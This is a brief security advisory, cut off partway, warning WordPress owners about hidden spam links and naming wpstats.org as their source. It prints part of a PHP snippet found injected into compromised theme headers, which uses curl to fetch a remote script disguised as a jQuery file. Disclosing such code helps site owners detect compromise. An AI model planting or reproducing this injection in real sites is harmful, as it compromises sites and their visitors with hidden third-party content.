If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site: if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT...
1